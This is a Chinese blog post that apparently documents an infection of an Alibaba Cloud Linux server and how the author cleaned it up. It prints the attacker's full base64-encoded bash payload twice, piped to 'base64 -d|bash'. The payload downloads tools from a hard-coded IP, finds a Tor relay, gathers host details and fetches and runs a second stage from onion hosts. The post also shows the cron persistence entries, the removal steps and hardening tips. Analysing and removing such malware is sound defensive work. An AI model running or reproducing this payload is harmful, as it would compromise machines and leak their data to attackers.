Linux 中木马病毒程序zsh -c echo WFJBTkRPTQpleGVjICY

博主： Dwtowen
发布时间：2021 年 02 月 23 日
566次浏览
暂无评论
12256字数
分类： Linux System

# Linux 木马病毒程序zsh -c echo WFJBTkRPTQpleGVjICY

## 一、背景

> 前两天接到一条阿里云的Linux服务器安全警告，开始没放在心上。第二天服务器就死机了（原因：服务器 CPU和内存占用100% 百分之百）。
> 于是强制重启了服务器，重启后，所有程序均可正常运行；（依然没管）；
> 第二天，服务器再次死机，于是开始怀疑是中木马或者病毒了；

## 二、分析

**根据阿里云提示信息**

貌似全是一堆 base64 编码后的脚本，啥意思我也没来的及去管，直接开始分析，删除；base64 编码的字符串可以 通过用 base64 解码,然后通过管道通过 bash 执行，进行解码查看。

zsh -c echo WFJBTkRPTQpleGVjICY……

脚本如下：

```bash
zsh -c echo WFJBTkRPTQpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZnVuY3Rpb24gX19jdXJsKCkgewogIHJlYWQgcHJvdG8gc2VydmVyIHBhdGggPDw8JChlY2hvICR7MS8vLy8gfSkKICBET0M9LyR7cGF0aC8vIC8vfQogIEhPU1Q9JHtzZXJ2ZXIvLzoqfQogIFBPUlQ9JHtzZXJ2ZXIvLyo6fQogIFtbIHgiJHtIT1NUfSIgPT0geCIke1BPUlR9IiBdXSAmJiBQT1JUPTgwCgogIGV4ZWMgMzw+L2Rldi90Y3AvJHtIT1NUfS8kUE9SVAogIGVjaG8gLWVuICJHRVQgJHtET0N9IEhUVFAvMS4wXHJcbkhvc3Q6ICR7SE9TVH1cclxuXHJcbiIgPiYzCiAgKHdoaWxlIHJlYWQgbGluZTsgZG8KICAgW1sgIiRsaW5lIiA9PSAkJ1xyJyBdXSAmJiBicmVhawogIGRvbmUgJiYgY2F0KSA8JjMKICBleGVjIDM+Ji0KfQoKY3VybCAtViB8fCB3Z2V0IC1xIGh0dHBzOi8vZ2l0aHViLmNvbS9tb3BhcmlzdGhlYmVzdC9zdGF0aWMtY3VybC9yZWxlYXNlcy9kb3dubG9hZC92Ny43NC4wL2N1cmwtYW1kNjQgLU8gL3Vzci9sb2NhbC9iaW4vY3VybDtjaG1vZCAreCAvdXNyL2xvY2FsL2Jpbi9jdXJsCmN1cmwgLVYgfHwgd2dldCAtcSBodHRwczovL2dpdGh1Yi5jb20vbW9wYXJpc3RoZWJlc3Qvc3RhdGljLWN1cmwvcmVsZWFzZXMvZG93bmxvYWQvdjcuNzQuMC9jdXJsLWFtZDY0IC1PICRIT01FL2N1cmw7Y2htb2QgK3ggJEhPTUUvY3VybApjdXJsIC1WIHx8IF9fY3VybCBodHRwOi8vOTQuMjM3Ljg1Ljg5OjgwODAvY3VybCA+IC91c3IvbG9jYWwvYmluL2N1cmw7Y2htb2QgK3ggL3Vzci9sb2NhbC9iaW4vY3VybApjdXJsIC1WIHx8IF9fY3VybCBodHRwOi8vOTQuMjM3Ljg1Ljg5OjgwODAvY3VybCA+ICRIT01FL2N1cmw7Y2htb2QgK3ggJEhPTUUvY3VybApzcyAtdiAgIHx8IGN1cmwgLXMgaHR0cDovL3BrZy5tdXNsLmNjL2lwcm91dGUyL3g4Nl82NC1saW51eC1tdXNsL3NiaW4vc3MgLW8gJEhPTUUvc3M7Y2htb2QgK3ggJEhPTUUvc3MKc3MgLXYgICB8fCBjdXJsIC1zIGh0dHA6Ly85NC4yMzcuODUuODk6ODA4MC9zcyAtbyAkSE9NRS9zcztjaG1vZCAreCAkSE9NRS9zcwpzcyAtdiAgIHx8IHdnZXQgLXEgaHR0cDovL3BrZy5tdXNsLmNjL2lwcm91dGUyL3g4Nl82NC1saW51eC1tdXNsL3NiaW4vc3MgLU8gJEhPTUUvc3M7Y2htb2QgK3ggJEhPTUUvc3MKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICJyeG14cHpma3lka3VsaGhxbnVmdGJtZjZkNXE2N2pqY2hvcG1oNG9mc3pmd3dubXo0YnFxMmZpZCIpCgpzb2NreigpIHsKbj0oZG9oLmRlZmF1bHRyb3V0ZXMuZGUgZG5zLmhvc3R1eC5uZXQgdW5jZW5zb3JlZC5sdXgxLmRucy5uaXhuZXQueHl6IGRucy5ydWJ5ZmlzaC5jbiBkbnMudHduaWMudHcgZG9oLmNlbnRyYWxldS5waS1kbnMuY29tIGRvaC5kbnMuc2IgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgZG5zLmZsYXR1c2xpZmlyLmlzIGRvaC5saSBkbnMuZGlnaXRhbGUtZ2VzZWxsc2NoYWZ0LmNoKQpwPSQoZWNobyAiZG5zLXF1ZXJ5P25hbWU9cmVsYXkudG9yMnNvY2tzLmluIikKcz0kKCRjIGh0dHBzOi8vJHtuWyQoKFJBTkRPTSUxMCkpXX0vJHAgfCBncmVwIC1vRSAiXGIoWzAtOV17MSwzfVwuKXszfVswLTldezEsM31cYiIgfHRyICcgJyAnXG4nfGdyZXAgLUV2IFsuXTB8c29ydCAtdVJ8aGVhZCAtbiAxKQp9CgpmZXhlKCkgewpmb3IgaSBpbiAuICRIT01FIC91c3IvYmluICRkIC90bXAgL3Zhci90bXAgO2RvIGVjaG8gZXhpdCA+ICRpL2kgJiYgY2htb2QgK3ggJGkvaSAmJiBjZCAkaSAmJiAuL2kgJiYgcm0gLWYgaSAmJiBicmVhaztkb25lCn0KCnUoKSB7CnNvY2t6CmY9L3NoLiQodW5hbWUgLW0pCng9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQpyPSQoY3VybCAtNGZzU0xrIGNoZWNraXAuYW1hem9uYXdzLmNvbXx8Y3VybCAtNGZzU0xrIGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbSlfJCh1bmFtZSAtbilfJChpcCBhfGdyZXAgJ2luZXQgJ3xhd2sgeydwcmludCAkMid9fG1kNXN1bXxhd2sgeydwcmludCAkMSd9KV8kKGNyb250YWIgLWx8YmFzZTY0IC13MCkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IC1lJHIgfHwgJGMgJDEkZiAtbyR4IC1lJHIKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLml0IG9uaW9uLmZvdW5kYXRpb24gb25pb24uY29tLmRlIG9uaW9uLnNoIHRvcjJ3ZWIuc3UKZG8KaWYgISBscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzOyB0aGVuCmZleGU7dSAkdC4kaApscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvdG1wO3UgJHQuJGgpCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC9kZXYvc2htO3UgJHQuJGgpCmVsc2UKYnJlYWsKZmkKZG9uZQo=|base64 -d|bash
```

通过 crontab 分析查看；crontab多了一条任务：

```
0 3 * * * /root/.systemd-service.sh > /dev/null 2>&1 &
```

根据 任务路径 `/root/.systemd-service.sh` 打开此文件，内容和阿里云提示脚本一致；

```bash
#!/bin/bash
exec &>/dev/null
zsh -c echo WFJBTkRPTQpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZnVuY3Rpb24gX19jdXJsKCkgewogIHJlYWQgcHJvdG8gc2VydmVyIHBhdGggPDw8JChlY2hvICR7MS8vLy8gfSkKICBET0M9LyR7cGF0aC8vIC8vfQogIEhPU1Q9JHtzZXJ2ZXIvLzoqfQogIFBPUlQ9JHtzZXJ2ZXIvLyo6fQogIFtbIHgiJHtIT1NUfSIgPT0geCIke1BPUlR9IiBdXSAmJiBQT1JUPTgwCgogIGV4ZWMgMzw+L2Rldi90Y3AvJHtIT1NUfS8kUE9SVAogIGVjaG8gLWVuICJHRVQgJHtET0N9IEhUVFAvMS4wXHJcbkhvc3Q6ICR7SE9TVH1cclxuXHJcbiIgPiYzCiAgKHdoaWxlIHJlYWQgbGluZTsgZG8KICAgW1sgIiRsaW5lIiA9PSAkJ1xyJyBdXSAmJiBicmVhawogIGRvbmUgJiYgY2F0KSA8JjMKICBleGVjIDM+Ji0KfQoKY3VybCAtViB8fCB3Z2V0IC1xIGh0dHBzOi8vZ2l0aHViLmNvbS9tb3BhcmlzdGhlYmVzdC9zdGF0aWMtY3VybC9yZWxlYXNlcy9kb3dubG9hZC92Ny43NC4wL2N1cmwtYW1kNjQgLU8gL3Vzci9sb2NhbC9iaW4vY3VybDtjaG1vZCAreCAvdXNyL2xvY2FsL2Jpbi9jdXJsCmN1cmwgLVYgfHwgd2dldCAtcSBodHRwczovL2dpdGh1Yi5jb20vbW9wYXJpc3RoZWJlc3Qvc3RhdGljLWN1cmwvcmVsZWFzZXMvZG93bmxvYWQvdjcuNzQuMC9jdXJsLWFtZDY0IC1PICRIT01FL2N1cmw7Y2htb2QgK3ggJEhPTUUvY3VybApjdXJsIC1WIHx8IF9fY3VybCBodHRwOi8vOTQuMjM3Ljg1Ljg5OjgwODAvY3VybCA+IC91c3IvbG9jYWwvYmluL2N1cmw7Y2htb2QgK3ggL3Vzci9sb2NhbC9iaW4vY3VybApjdXJsIC1WIHx8IF9fY3VybCBodHRwOi8vOTQuMjM3Ljg1Ljg5OjgwODAvY3VybCA+ICRIT01FL2N1cmw7Y2htb2QgK3ggJEhPTUUvY3VybApzcyAtdiAgIHx8IGN1cmwgLXMgaHR0cDovL3BrZy5tdXNsLmNjL2lwcm91dGUyL3g4Nl82NC1saW51eC1tdXNsL3NiaW4vc3MgLW8gJEhPTUUvc3M7Y2htb2QgK3ggJEhPTUUvc3MKc3MgLXYgICB8fCBjdXJsIC1zIGh0dHA6Ly85NC4yMzcuODUuODk6ODA4MC9zcyAtbyAkSE9NRS9zcztjaG1vZCAreCAkSE9NRS9zcwpzcyAtdiAgIHx8IHdnZXQgLXEgaHR0cDovL3BrZy5tdXNsLmNjL2lwcm91dGUyL3g4Nl82NC1saW51eC1tdXNsL3NiaW4vc3MgLU8gJEhPTUUvc3M7Y2htb2QgK3ggJEhPTUUvc3MKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICJyeG14cHpma3lka3VsaGhxbnVmdGJtZjZkNXE2N2pqY2hvcG1oNG9mc3pmd3dubXo0YnFxMmZpZCIpCgpzb2NreigpIHsKbj0oZG9oLmRlZmF1bHRyb3V0ZXMuZGUgZG5zLmhvc3R1eC5uZXQgdW5jZW5zb3JlZC5sdXgxLmRucy5uaXhuZXQueHl6IGRucy5ydWJ5ZmlzaC5jbiBkbnMudHduaWMudHcgZG9oLmNlbnRyYWxldS5waS1kbnMuY29tIGRvaC5kbnMuc2IgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgZG5zLmZsYXR1c2xpZmlyLmlzIGRvaC5saSBkbnMuZGlnaXRhbGUtZ2VzZWxsc2NoYWZ0LmNoKQpwPSQoZWNobyAiZG5zLXF1ZXJ5P25hbWU9cmVsYXkudG9yMnNvY2tzLmluIikKcz0kKCRjIGh0dHBzOi8vJHtuWyQoKFJBTkRPTSUxMCkpXX0vJHAgfCBncmVwIC1vRSAiXGIoWzAtOV17MSwzfVwuKXszfVswLTldezEsM31cYiIgfHRyICcgJyAnXG4nfGdyZXAgLUV2IFsuXTB8c29ydCAtdVJ8aGVhZCAtbiAxKQp9CgpmZXhlKCkgewpmb3IgaSBpbiAuICRIT01FIC91c3IvYmluICRkIC90bXAgL3Zhci90bXAgO2RvIGVjaG8gZXhpdCA+ICRpL2kgJiYgY2htb2QgK3ggJGkvaSAmJiBjZCAkaSAmJiAuL2kgJiYgcm0gLWYgaSAmJiBicmVhaztkb25lCn0KCnUoKSB7CnNvY2t6CmY9L3NoLiQodW5hbWUgLW0pCng9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQpyPSQoY3VybCAtNGZzU0xrIGNoZWNraXAuYW1hem9uYXdzLmNvbXx8Y3VybCAtNGZzU0xrIGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbSlfJCh1bmFtZSAtbilfJChpcCBhfGdyZXAgJ2luZXQgJ3xhd2sgeydwcmludCAkMid9fG1kNXN1bXxhd2sgeydwcmludCAkMSd9KV8kKGNyb250YWIgLWx8YmFzZTY0IC13MCkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IC1lJHIgfHwgJGMgJDEkZiAtbyR4IC1lJHIKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLml0IG9uaW9uLmZvdW5kYXRpb24gb25pb24uY29tLmRlIG9uaW9uLnNoIHRvcjJ3ZWIuc3UKZG8KaWYgISBscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzOyB0aGVuCmZleGU7dSAkdC4kaApscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvdG1wO3UgJHQuJGgpCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC9kZXYvc2htO3UgJHQuJGgpCmVsc2UKYnJlYWsKZmkKZG9uZQo=|base64 -d|bash
```

那么接下来，crontab 中的 `0 3 * * * /root/.systemd-service.sh > /dev/null 2>&1 &` 与 ` /root/.systemd-service.sh` 木马脚本，是需要我们删除的。

经过进一步的分析，返现在 `/etc/cron.d` 目录下，多了个 `0systemd-service` 程序。

```bash
cd /etc/cron.d
```

查看 0systemd-service 程序，如下，依然多了一条相同的任务；

```bash
0 0 * * * root /opt/systemd-service.sh > /dev/null 2>&1 &
```

查看 `/opt/systemd-service.sh` 脚本，与之前的`/root/.systemd-service.sh` 脚本内容一样；

```
vim /opt/systemd-service.sh
```

## 三、删除木马任务及脚本

1. 删除 crontab 中的任务；

```
crontab -e
```

删除如下任务

```
0 3 * * * /root/.systemd-service.sh > /dev/null 2>&1 &
```

2. 删除 `/root/.systemd-service.sh` 脚本

```
rm -rf /root/.systemd-service.sh
```

3. 删除 `/etc/cron.d/0systemd-service` 程序。

```
rm -rf /etc/cron.d/0systemd-service
```

4. 删除 `/etc/cron.d/0systemd-service` 程序中的任务指向脚本 `/opt/systemd-service.sh` .

```
rm -rf /opt/systemd-service.sh
```

## 四、维护

很多时候黑客或者恶意着会通过 ssh 暴力破解进入你的服务器执行相关的木马操作。建议做以下几点操作。

1. 更改 sshd 的运行端口。可通过 `/etc/ssh/sshd_config` 文件来完成修改；
2. 更改服务器用户密码，尽量改的复杂些。登入用户后，通过 `passwd` 命令，根据提示，即可直接修改；
3. 如果服务器防火墙未开启，请务必开启；

开机启用

```
systemctl enable firewalld
```

启动

```
systemctl start firewalld
```

End Thanks！😁

最后修改：2021 年 02 月 23 日 10 : 54 AM

如果觉得我的文章对你有用，请随意赞赏

发表评论取消回复

评论 *

私密评论

名称 *

🎲

邮箱 *

地址

Linux 中木马病毒程序zsh -c echo WFJBTkRPTQpleGVjICY

Dwtowen • 2021 年 02 月 23 日

# Linux 木马病毒程序zsh -c echo WFJBTkRPTQpleGVjICY

## 一、背景

## 二、分析

**根据阿里云提示信息**

zsh -c echo WFJBTkRPTQpleGVjICY……

脚本如下：

通过 crontab 分析查看；crontab多了一条任务：

```
0 3 * * * /root/.systemd-service.sh > /dev/null 2>&1 &
```

根据 任务路径 `/root/.systemd-service.sh` 打开此文件，内容和阿里云提示脚本一致；

那么接下来，crontab 中的 `0 3 * * * /root/.systemd-service.sh > /dev/null 2>&1 &` 与 ` /root/.systemd-service.sh` 木马脚本，是需要我们删除的。

经过进一步的分析，返现在 `/etc/cron.d` 目录下，多了个 `0systemd-service` 程序。

```bash
cd /etc/cron.d
```

查看 0systemd-service 程序，如下，依然多了一条相同的任务；

```bash
0 0 * * * root /opt/systemd-service.sh > /dev/null 2>&1 &
```

查看 `/opt/systemd-service.sh` 脚本，与之前的`/root/.systemd-service.sh` 脚本内容一样；

```
vim /opt/systemd-service.sh
```

## 三、删除木马任务及脚本

1. 删除 crontab 中的任务；

```
crontab -e
```

删除如下任务

```
0 3 * * * /root/.systemd-service.sh > /dev/null 2>&1 &
```

2. 删除 `/root/.systemd-service.sh` 脚本

```
rm -rf /root/.systemd-service.sh
```

3. 删除 `/etc/cron.d/0systemd-service` 程序。

```
rm -rf /etc/cron.d/0systemd-service
```

4. 删除 `/etc/cron.d/0systemd-service` 程序中的任务指向脚本 `/opt/systemd-service.sh` .

```
rm -rf /opt/systemd-service.sh
```

## 四、维护

很多时候黑客或者恶意着会通过 ssh 暴力破解进入你的服务器执行相关的木马操作。建议做以下几点操作。

开机启用

```
systemctl enable firewalld
```

启动

```
systemctl start firewalld
```

End Thanks！😁

Linux 中木马病毒程序zsh -c echo WFJBTkRPTQpleGVjICY

发表评论取消回复

Typecho评论邮件提醒插件-CommentToMail - 美化版

7zip批量压缩文件夹批量打包

Typecho在QQ和微信上打开无法评论

Typecho发布动态/说说的时间不对，往后了8小时

CentOS安装远程桌面通过Windows远程桌面RDP mstsc 直接访问

Linux SSH远程连接登录慢、输入远程信息后，需要过几秒才能跳转

CentOS 7 + Nginx + PHP + MySql + EduSoho 安装文档

CentOS添加环境变量

CentOS Hexo-Butterfly快速搭建

搞定无压工作的艺术 - 笔记

Linux 中木马病毒程序zsh -c echo WFJBTkRPTQpleGVjICY

发表评论 取消回复

Linux 中木马病毒程序zsh -c echo WFJBTkRPTQpleGVjICY

发表评论取消回复